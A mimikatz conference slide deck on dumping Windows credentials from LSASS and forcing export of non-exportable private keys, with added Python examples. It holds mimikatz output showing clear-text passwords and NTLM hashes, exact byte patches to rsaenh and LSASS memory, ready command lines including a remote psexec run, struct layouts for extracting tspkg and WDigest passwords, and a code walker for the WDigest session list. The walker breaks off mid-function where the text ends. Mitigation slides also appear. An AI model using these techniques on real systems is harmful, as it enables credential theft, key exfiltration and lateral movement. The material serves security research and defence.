  mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */ - http://blog.gentilkiwi.com/mimikatz
mimikatz # privilege::debug
Request to ENABLE privilege : SeDebugPrivilege : OK
mimikatz # sekurlsa::logonPasswords full
Authentication Id      : 0;234870
Authentication package : NTLM
Primary user           : Gentil Kiwi
Authentication domain  : vm-w8-rp-x
    msv1_0 :   User : Gentil Kiwi / Domain : vm-w8-rp-x / LM hash : d0e9aee149655a6075e4540af1f22d3b / NTLM hash : cc36cf7a8514893efccd332446158b1a
    kerberos : User : Gentil Kiwi / Domain : vm-w8-rp-x / Password : waza1234
    wdigest :  User : Gentil Kiwi / Domain : vm-w8-rp-x /Password : waza1234
    tspkg :    User : Gentil Kiwi / Domain : vm-w8-rp-x / Password : waza1234
    livessp :  n.t. (LUID KO)
mimikatz sekurlsa: what we can do
Basics
- No physical access to the computer (first step to pass the hash, then pass the pass)
- No admin rights / system rights / debug privileges (…)
- Disable local admin accounts
- Strong passwords (haha, it was a joke, so useless ;))
- For privileged accounts: network logon instead of interactive (when possible)
- Audit pass-the-hash: it leaves traces and can lock accounts
- No admin rights / system rights / debug privileges, even for VIPs
- Use a separate network (or forest) for privileged tasks
More in depth
- Force strong authentication (SmartCard & Token) $ €
- Short validity for Kerberos tickets
- No delegation
- Disable NTLM (available with NT6)
- Nothing exotic:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign-on
- Stop shared secrets for authentication, push public/private stuff (like keys ;))
- Take the opportunities to stop backward compatibility
- Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz crypto: what is it?
A little module that I wrote to:
- play with the Windows Cryptographic API, CNG and RSA keys
- automate the export of certificates/keys
  • Even those which are "not" exportable
What the crypto module can do:
- List
  • Providers
  • Stores
  • Certificates
  • Keys
- Export
  • Certificates
    - public part in DER format
    - with private keys in PFX format
  • Private keys in PVK format (it's cool, OpenSSL can deal with it too)
- Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again ;))
(module: mod_mimikatz_crypto)
mimikatz crypto: how it's protected
Private keys are DPAPI protected
- You cannot reuse private key files on another computer
  • At least not without the master keys and/or the users' passwords
Computer/User can load their own keys because they have enough secrets to do it (e.g. an opened session)
- Yes, a computer/server opens a "session"
Export/Usage can be limited by:
- Password (a constraint for most users; unavailable for computer keys)
- Popup (a constraint for most users; unavailable for computer keys)
- Export/Archive flag not present
  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz crypto capi: how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
- http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard reader, …
- cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz crypto capi: how it's exported (PLAYSKOOL level)
[Diagram: Process → CryptoAPI and RSA CSP (in the process) → DPAPI decode → Load Private Key → Ask to export Key → Exportable? yes: Exported Key / no: NTE_BAD_KEY_STATE]
mimikatz crypto patch capi: because I own my process
When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey
This function does all the work to prepare the export and checks if the key is exportable

mimikatz # crypto::exportCertificates
Location : CERT_SYSTEM_STORE_CURRENT_USER/My
 - Benjamin Delpy
        Key container  : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Type           : AT_KEYEXCHANGE
        Exportability  : NO
        Key size       : 2048
        Private export in 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Key not valid for use in specified state.
        Public export in 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificate 0 ================
Serial Number: 112169417a1c3ef46a301f99385f50680fa0
Issuer: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Subject: CN=Benjamin Delpy, C=FR
Non-root Certificate
Cert Hash(sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Key Container = 470ADFBA-8718-4014-B05E-B30776B75A03
  Provider = Microsoft Enhanced Cryptographic Provider v1.0
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.
mimikatz crypto patch capi: because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space: let's patch it
I wrote "4" bytes in my memory space:

  .text:0AC0B7CB 0F 85 33 C7 FF FF    jnz     continue_key_export_or_archive
becomes
  .text:0AC0B7CB 90                   nop
  .text:0AC0B7CC E9 33 C7 FF FF       jmp     continue_key_export_or_archive

  .text:0AC1F749 0F 85 B6 3B FF FF    jnz     continue_key_export_or_archive_prepare
becomes
  .text:0AC1F749 90                   nop
  .text:0AC1F74A E9 B6 3B FF FF       jmp     continue_key_export_or_archive_prepare
mimikatz crypto patch capi: demo time
Import, export, import as not exportable… export
mimikatz crypto patch capi: limitations
Because:
- I'm lazy
- I've seen RSA keys in the majority of real-life cases
  • Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with:
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz crypto cng: how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
- http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time key operations are not made in the "user" process context
Processes use RPC to call the "Key isolation service" (keyiso) functions
It seems more secure than CryptoAPI…
- It is, but it's not perfect…
mimikatz crypto cng: how it's exported (PLAYSKOOL level)
[Diagram: Process → CNG → RPC → KeyIso Service in the LSASS process (on NT6 a system protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP | SYSTEM_MANDATORY_LABEL_NO_READ_UP) → DPAPI decode → Load Private Key → Ask to export Key → Exportable? yes: Exported Key / no: NTE_NOT_SUPPORTED]
mimikatz crypto patch cng: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (keyiso): ncrypt!SPCryptExportKey
This function does all the work to prepare the export and checks if the key is exportable

mimikatz # crypto::exportKeys
[user] CNG keys
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportability  : NO
        Key size       : 2048
        Private export in 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
        mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK : (0x80090029) The requested operation is not supported.
mimikatz crypto patch cng: because sometimes I own LSASS
This time the checks and the keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…

  .text:6C815210 75 1C    jnz     short continue_key_export
becomes
  .text:6C815210 EB 1C    jmp     short continue_key_export
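Worked example (added here, not from the slides or from mimikatz) of the two patches above, the CAPI one at two sites of rsaenh and the CNG one in LSASS: only the opcode bytes change (0F 85 → 90 E9 for jnz rel32, so 2 bytes per site and 4 in total; 75 → EB for jnz short, 1 byte), and the displacement is kept as-is. That works because the nop moves the 5-byte jmp one byte forward, exactly the byte it is shorter than the 6-byte jnz, so the branch target is unchanged; for the short form both encodings are 2 bytes. The code decodes the bytes quoted on the slides, applies the patch and checks the target. Addresses and bytes are the ones on the slides; the small decoder only knows the opcodes involved.

```python
"""
The CAPI and CNG patches quoted on the slides, applied and checked. Added
example, not mimikatz code: it only knows the opcodes involved
(jnz rel32 0F 85, jmp rel32 E9, jnz short 75, jmp short EB, nop 90)
and the addresses/bytes are the ones from the slides.
"""
import struct


def decode(addr, code):
    """Decode one instruction at addr: (mnemonic, length, target or None)."""
    op = code[0]
    if op == 0x0F and len(code) > 1 and code[1] == 0x85:        # jnz rel32
        rel = struct.unpack("<i", code[2:6])[0]
        return "jnz", 6, (addr + 6 + rel) & 0xFFFFFFFF
    if op == 0xE9:                                               # jmp rel32
        rel = struct.unpack("<i", code[1:5])[0]
        return "jmp", 5, (addr + 5 + rel) & 0xFFFFFFFF
    if op == 0x75:                                               # jnz short rel8
        return "jnz short", 2, (addr + 2 + struct.unpack("<b", code[1:2])[0]) & 0xFFFFFFFF
    if op == 0xEB:                                               # jmp short rel8
        return "jmp short", 2, (addr + 2 + struct.unpack("<b", code[1:2])[0]) & 0xFFFFFFFF
    if op == 0x90:
        return "nop", 1, None
    raise ValueError(f"unknown opcode {op:#04x} at {addr:#x}")


def disassemble(addr, code):
    """Linear sweep: [(address, mnemonic, target), ...]."""
    out, off = [], 0
    while off < len(code):
        mnem, length, target = decode(addr + off, code[off:])
        out.append((addr + off, mnem, target))
        off += length
    return out


def force_jump(code):
    """Turn the jnz at the start of code into an unconditional jump of the same
    total length, leaving the displacement bytes untouched."""
    if code[:2] == b"\x0f\x85":
        return b"\x90\xe9" + code[2:6]           # nop; jmp rel32  (2 bytes changed)
    if code[:1] == b"\x75":
        return b"\xeb" + code[1:2]               # jmp short rel8  (1 byte changed)
    raise ValueError("expected a jnz")


def patch_preserves_target(addr, code):
    """True if the only jump in the patched bytes lands where the original jnz did."""
    original = decode(addr, code)[2]
    patched = [t for _, m, t in disassemble(addr, force_jump(code)) if m.startswith("jmp")]
    return patched == [original]


# Sites from the slides: rsaenh (CAPI, two sites) and the CNG check in LSASS
SITES = {
    0x0AC0B7CB: bytes.fromhex("0F8533C7FFFF"),   # jnz continue_key_export_or_archive
    0x0AC1F749: bytes.fromhex("0F85B63BFFFF"),   # jnz continue_key_export_or_archive_prepare
    0x6C815210: bytes.fromhex("751C"),           # jnz short continue_key_export
}

if __name__ == "__main__":
    for addr, code in SITES.items():
        patched = force_jump(code)
        print(f"{addr:08X} {code.hex(' ').upper():20s} -> {patched.hex(' ').upper():20s}",
              "target kept" if patch_preserves_target(addr, code) else "TARGET CHANGED")
        for a, m, t in disassemble(addr, patched):
            print(f"    {a:08X} {m:10s} {'' if t is None else f'{t:08X}'}")
```

The addresses are from the presenter's own rsaenh/ncrypt builds; on any other build the sites have to be located again (by symbol or pattern), which is the part a real patcher spends its effort on, not on the two-byte rewrite.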
mimikatz crypto patch cng: demo time
Import, export, import as not exportable… export again
mimikatz crypto patch cng: limitations
The patch operation needs some privileges:
- Admin (debug privilege)
- SYSTEM
mimikatz crypto::patchcng only deals with:
- Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
- certutil can…
mimikatz crypto patch cng: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
- until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
- Yeah, like the good old certutil

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.

Same command after the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Encryption test passed
CertUtil: -exportPFX command completed successfully.
mimikatz crypto: memo
Some commands:
  mimikatz crypto::patchcapi crypto::exportCertificates exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
  mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
  mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
- PFX files are protected by this password: mimikatz
Keys
- When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
- When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz crypto: what we can do
Exactly the same as for sekurlsa: it will prevent access to accounts/computers
- no admin, no admin, no admin…
Basics
- Use smartcards/tokens for user certificates
- Use Hardware Security Modules (HSM), even SoftHSM
More in depth
- See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
- Verify the vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz: what else can it do?
- Play with minesweeper
- Manipulate some handles
- Pass the hash
- Dump SAM / AD
- Stop event monitoring
- Patch Terminal Server
- Basic GPO bypass
- Applocker / SRP bypass
- Driver
  - Play with tokens & privileges
  - Display SSDT x86 & x64
  - List minifilters actions
  - List Notifications (process, thread, image, registry)
  - List Objects hooks and procedures
  - …
- …
mimikatz: that's all folks
Thanks to / Merci à
- my girlfriend for her support (her LSASS crashed a few times)
- Application Security Forum for offering me this great opportunity
  • Partners and Sponsors for sure
- Microsoft for always considering it as normal/acceptable
- Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
- You, for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz sekurlsa: how LSA works (PLAYSKOOL level)
[Diagram: WinLogon → user/domain/password → LsaSS → Authentication Packages (msv1_0, tspkg, wdigest, livessp, kerberos); authentication done by msv1_0 (SAM, Challenge/Response) and kerberos]
mimikatz sekurlsa: how LSA works (PLAYSKOOL level)
Authentication packages:
- take the user's credentials from the logon
- make their own stuff
- keep enough data in memory to compute responses to challenges (Single Sign On)
If we can get this data and inject it into another LSASS session, we avoid the authentication part
This is the principle of « Pass-the-hash »
- In fact, of « Pass-the-x »
mimikatz sekurlsa: history of « pass-the-* » 1/2
Pass-the-hash
- 1997 - Unix: modified SAMBA client for hash usage, Paul Ashton (EIGEN)
- 2000 - Private version of a Windows « LSA Logon Session Editor », Hernan Ochoa (CoreSecurity)
- 2007 - TechEd Microsoft: Marc Murray (TrueSec) presents msvctl and provides some downloads of it
- 2007 - « Pass the hash toolkit » published, Hernan Ochoa (CoreSecurity)
- 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself, but in French so not famous ;))
2007 was the year of pass the hash!
Pass-the-ticket
- 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support, Hernan Ochoa (Ampliasecurity)
mimikatz sekurlsa: history of « pass-the-* » 2/2
Pass-the-pass
- 05/2011 - mimikatz 1.0 dumps the first clear text passwords from the TsPkg provider (but limited to NT 6 and some XP SP3)
  • http://blog.gentilkiwi.com/securite/pass-the-pass
- 05/2011 - return of mimikatz: it dumps clear text passwords from the WDigest provider (unlimited this time ;))
  • http://blog.gentilkiwi.com/securite/re-pass-the-pass
- 05/2011 - Some organizations opened cases with Microsoft about it…
…Lots of time…
- beginning of 2012 - Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
- 03/2012 - Hernan Ochoa (Ampliasecurity) publishes on seclists that wce supports WDigest password extraction…
  • http://seclists.org/pen-test/2012/Mar/7
- 03/2012 - mimikatz strikes again with the LiveSSP provider and extracts Live login passwords from Windows 8 memory
  • http://blog.gentilkiwi.com/securite/rere-pass-the-pass
- 03/2012 - yeah, once again… more curious, but Kerberos keeps passwords in memory
  • http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
- 08/2012 - sekurlsa module without any injection at all (ultra safe)
  • http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
mimikatz sekurlsa: tspkg
because sometimes the hash is not enough…
mimikatz sekurlsa tspkg: what is it?
Microsoft introduces SSO capability for Terminal Server with NT 6, to improve RemoteApps and Remote Desktop users' experience
- http://technet.microsoft.com/library/cc772108.aspx
Relies on CredSSP with Credentials Delegation (= Account delegation)
- Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/[ms-cssp].pdf
First impression: it seems cool
- The user does not have to type their password
- The password is not in the RDP file
- The password is not in the user's secrets
mimikatz sekurlsa tspkg: questions
The KB says that for it to work we must enable « Default credentials » delegation
- "Default credentials: The credentials obtained when the user first logs on to Windows" - https://msdn.microsoft.com/library/bb204773.aspx
  • What? Our User/Domain/Password? | Hash? | Ticket? It seems…
- In all cases the system seems to be vulnerable to pass-the-…
In what form? Our specs, [MS-CSSP]:
- 2.2.1.2.1 TSPasswordCreds
  • The TSPasswordCreds structure contains the user's password credentials that are delegated to the server (or PIN).
    TSPasswordCreds ::= SEQUENCE {
        domainName [0] OCTET STRING,
        userName   [1] OCTET STRING,
        password   [2] OCTET STRING
    }
- Challenge/response for authentication?
  • Server: YES (TLS, Kerberos)
  • Client: NO, the password is sent to the server…
So the password resides somewhere in memory
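Added example, not part of the slides or of mimikatz: a DER encoder/decoder for the TSPasswordCreds structure quoted above. CredSSP ([MS-CSSP]) uses DER with explicit context tags, so each field is a [n] wrapper (0xA0 + n) around an OCTET STRING (0x04) holding the UTF-16LE text. The credentials in the sample are made up. The decoder rejects wrong tags and trailing data, which is what anything that parses delegated credentials should do.

```python
"""
DER encoder/decoder for [MS-CSSP] TSPasswordCreds:
  TSPasswordCreds ::= SEQUENCE { domainName [0] OCTET STRING,
                                 userName   [1] OCTET STRING,
                                 password   [2] OCTET STRING }
Added example, not from the slides or mimikatz. CredSSP encodes the [n] tags
explicitly (0xA0+n wrapping a 0x04 OCTET STRING) and the strings as UTF-16LE.
Sample credentials are made up.
"""

SEQUENCE, OCTET_STRING, CONTEXT = 0x30, 0x04, 0xA0
FIELDS = ("domainName", "userName", "password")


def der_len(n):
    """DER length: short form below 128, long form (0x80 | nbytes, then big-endian) above."""
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b


def tlv(tag, body):
    return bytes([tag]) + der_len(len(body)) + body


def encode_ts_password_creds(domain, user, password):
    body = b"".join(tlv(CONTEXT | i, tlv(OCTET_STRING, s.encode("utf-16-le")))
                    for i, s in enumerate((domain, user, password)))
    return tlv(SEQUENCE, body)


def read_tlv(buf, off):
    """Parse one TLV at buf[off:], return (tag, body, offset after it)."""
    if off + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first = buf[off], buf[off + 1]
    off += 2
    if first & 0x80:
        n = first & 0x7F
        if n == 0 or off + n > len(buf):
            raise ValueError("bad long-form length")
        length, off = int.from_bytes(buf[off:off + n], "big"), off + n
    else:
        length = first
    end = off + length
    if end > len(buf):
        raise ValueError("TLV body runs past end of buffer")
    return tag, buf[off:end], end


def decode_ts_password_creds(blob):
    tag, body, end = read_tlv(blob, 0)
    if tag != SEQUENCE or end != len(blob):
        raise ValueError("expected a single SEQUENCE")
    creds, off = {}, 0
    for i, name in enumerate(FIELDS):
        ctag, cbody, off = read_tlv(body, off)
        if ctag != CONTEXT | i:
            raise ValueError(f"expected [{i}] for {name}, got tag {ctag:#x}")
        otag, octets, oend = read_tlv(cbody, 0)
        if otag != OCTET_STRING or oend != len(cbody):
            raise ValueError(f"{name}: expected exactly one OCTET STRING inside [{i}]")
        creds[name] = octets.decode("utf-16-le")
    if off != len(body):
        raise ValueError("trailing data inside SEQUENCE")
    return creds


if __name__ == "__main__":
    blob = encode_ts_password_creds("vm-w8-rp-x", "Gentil Kiwi", "waza1234")   # made-up creds
    print(blob.hex())
    print(decode_ts_password_creds(blob))
```

In the real exchange this blob is itself wrapped in a TSCredentials structure and sent inside the TLS channel, encrypted under the CredSSP public-key binding; that wrapping is not shown here.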
mimikatz sekurlsa tspkg: symbols & theory
Let's explore some symbols
- sounds cool… (thanks Microsoft)
Let's imagine a scenario:
- Enumerate all sessions to obtain
  • Username
  • Domain
  • LUID
- Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain
  • TS_CREDENTIAL
- Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with the TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
  • TS_PRIMARY_CREDENTIAL with clear text credentials…

kd> x tspkg!*clear*
75016d1c          tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68          tspkg!TSDuplicatePassword = <no type information>
75011cd4          tspkg!TSHidePassword = <no type information>
750195ee          tspkg!TSRevealPassword = <no type information>
75012fbd          tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b          tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz sekurlsa tspkg: workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on tspkg!TSGlobalCredTable → KIWI_TS_CREDENTIAL → pTsPrimary → KIWI_TS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

    typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
        PVOID unk0;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Password;
    } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

    typedef struct _KIWI_TS_CREDENTIAL {
    #ifdef _M_X64
        BYTE unk0[108];
    #elif defined _M_IX86
        BYTE unk0[64];
    #endif
        LUID LocallyUniqueIdentifier;
        PVOID unk1;
        PVOID unk2;
        PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
    } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz sekurlsa tspkg: demo time
sekurlsa::tspkg
mimikatz sekurlsa: wdigest
because a clear text password over http/https is not cool
mimikatz sekurlsa wdigest: what is it?
"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network. […]" Wikipedia - http://en.wikipedia.org/wiki/Digest_access_authentication
"Common Digest Authentication Scenarios
- Authenticated client access to a Web site
- Authenticated client access using SASL
- Authenticated client access with integrity protection to a directory service using LDAP" Microsoft - http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool:
- No password over the network, just hashes
- No reversible password in Active Directory, hashes for each realm
  • Only with Advanced Digest authentication
mimikatz sekurlsa wdigest: what is it?
We speak about hashes, but what hashes? H = MD5(HA1:nonce:[…]:HA2)
  • HA1 = MD5(username:realm:password)
  • HA2 = MD5(method:digestURI[…])
Even after login HA1 may change… the realm is chosen server side and cannot be determined before the Windows logon
The WDigest provider must have the elements to compute responses for different servers:
- Username
- Realm (from the server)
- Password
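As an added example (not part of the slides), the RFC 2617 Digest computation in Python, run for the same user and password against several realms: because HA1 is MD5(username:realm:password) and the realm is picked by the server, a client that must be able to answer any server has to keep the password (or one HA1 per realm) after logon, which is what WDigest does. server_verify shows the other side, a server that stores only HA1 and no clear-text password, as "Advanced Digest" does. The user names, realms, nonces and URIs below are constructed, except the reference vector from RFC 2617 section 3.5 used as a check.

```python
"""
RFC 2617 Digest access authentication, computed for one password against
several realms. Added example, not part of the slides. The reference vector
in rfc2617_example() is the one from RFC 2617 section 3.5; other names,
realms, nonces and URIs are constructed.
"""
import hashlib


def md5hex(s):
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def ha1(username, realm, password):
    """HA1 = MD5(username:realm:password): depends on the server-chosen realm."""
    return md5hex(f"{username}:{realm}:{password}")


def ha2(method, digest_uri):
    return md5hex(f"{method}:{digest_uri}")


def response_from_ha1(a1, nonce, method, uri, nc=None, cnonce=None, qop=None):
    """Digest response given HA1: qop=auth form when qop is set, RFC 2069 form otherwise."""
    a2 = ha2(method, uri)
    if qop:
        return md5hex(f"{a1}:{nonce}:{nc}:{cnonce}:{qop}:{a2}")
    return md5hex(f"{a1}:{nonce}:{a2}")


def response(username, realm, password, nonce, method, uri, **kw):
    return response_from_ha1(ha1(username, realm, password), nonce, method, uri, **kw)


def responses_for_realms(username, password, realms, nonce, method, uri):
    """What a client must be able to produce after logon: one answer per realm.
    The realm is only known when the server challenges, so either the password
    or a per-realm HA1 has to stay available in memory."""
    return {realm: response(username, realm, password, nonce, method, uri) for realm in realms}


def server_verify(stored_ha1, nonce, method, uri, client_response, **kw):
    """Server side holding only HA1 (no clear-text password), as 'Advanced Digest' does."""
    return response_from_ha1(stored_ha1, nonce, method, uri, **kw) == client_response


def rfc2617_example():
    """The worked example from RFC 2617 3.5 (user Mufasa, realm testrealm@host.com)."""
    return response("Mufasa", "testrealm@host.com", "Circle Of Life",
                    "dcd98b7102dd2f0e8b11d0f600bfb0c093", "GET", "/dir/index.html",
                    nc="00000001", cnonce="0a4f113b", qop="auth")


if __name__ == "__main__":
    nonce = "0123456789abcdef"                       # constructed
    for realm, r in responses_for_realms("gentilkiwi", "waza1234", ["intranet", "mail"],
                                         nonce, "GET", "/").items():
        print(f"{realm:10s} HA1={ha1('gentilkiwi', realm, 'waza1234')} response={r}")
    print("RFC 2617 vector:", rfc2617_example())
```

Note that a server storing HA1 per realm still holds an MD5 of the password that is reusable against that realm, so the "no reversible password in AD" property only limits the blast radius, it does not remove the shared secret.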
mimikatz sekurlsa wdigest: theory
This time we know:
- that WDigest keeps the password in memory « by protocol », for the HA1 digest
- that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
LsaUnprotectMemory
- At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
- Let's search for it in WDigest
- Hypothesis seems verified
LsaProtectMemory
- At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
- Let's search for it in WDigest
- SpAcceptCredentials takes the clear password in its args
  • Protects it with LsaProtectMemory
  • Updates or inserts data in the doubly linked list wdigest!l_LogSessList

  .text:7409D151    _DigestCalcHA1@8          call dword ptr [eax+0B4h]
  .text:74096C69    _SpAcceptCredentials@16   call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest: workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list wdigest!l_LogSessList for the LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear]

    typedef struct _KIWI_WDIGEST_LIST_ENTRY {
        struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
        struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
        DWORD UsageCount;
        struct _KIWI_WDIGEST_LIST_ENTRY *This;
        LUID LocallyUniqueIdentifier;
        /* […] */
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
        /* […] */
    } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
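Added example (not mimikatz code): the workflow above as a Python walk of wdigest!l_LogSessList over a copy of LSASS memory, picking the entry whose LocallyUniqueIdentifier matches a LUID from LsaEnumerateLogonSessions. The slide elides the fields between the LUID and UserName; the layout assumed here is x86 with 8 unknown bytes there, and the memory image is constructed. The password comes back still protected: decrypting it is the LsaUnprotectMemory / LsaEncryptMemory step of the NT5/NT6 key slides, not shown here.

```python
"""
Walk wdigest!l_LogSessList in a copy of LSASS memory and pick the entry for a
given logon session LUID. Added example, not mimikatz code. The slide elides
the fields between LocallyUniqueIdentifier and UserName; the x86 layout below
assumes 8 unknown bytes there. The memory image is constructed and the
password is a stand-in for LsaProtectMemory output, returned still protected.
"""
import struct

# KIWI_WDIGEST_LIST_ENTRY (x86): Flink, Blink, UsageCount, This, LUID, 8 assumed bytes,
# then UserName / Domaine / Password as LSA_UNICODE_STRING {Length, MaximumLength, Buffer}
ENTRY = struct.Struct("<IIIIQ8xHHIHHIHHI")


def read(img, addr, size):
    """img is (base, bytes): one flat LSASS region."""
    base, data = img
    off = addr - base
    if off < 0 or off + size > len(data):
        raise ValueError(f"read outside image: {addr:#x}+{size}")
    return data[off:off + size]


def walk_log_sess_list(img, head):
    """Yield a dict per entry on the doubly linked list whose LIST_ENTRY head is at head."""
    seen, cur = set(), struct.unpack("<I", read(img, head, 4))[0]       # head.Flink
    while cur != head:
        if cur in seen:
            raise RuntimeError(f"list cycle at {cur:#x}")
        seen.add(cur)
        f = ENTRY.unpack(read(img, cur, ENTRY.size))
        flink, usage, luid = f[0], f[2], f[4]
        u_len, _, u_buf, d_len, _, d_buf, p_len, _, p_buf = f[5:]
        yield {
            "addr": cur, "luid": luid, "usage": usage,
            "user": read(img, u_buf, u_len).decode("utf-16-le"),
            "domain": read(img, d_buf, d_len).decode("utf-16-le"),
            "password_protected": read(img, p_buf, p_len),          # LsaUnprotectMemory next
        }
        cur = flink


def find_session(img, head, luid):
    """The step 'for each LUID from LsaEnumerateLogonSessions: search the list'."""
    return next((e for e in walk_log_sess_list(img, head) if e["luid"] == luid), None)


def build_sample_image():
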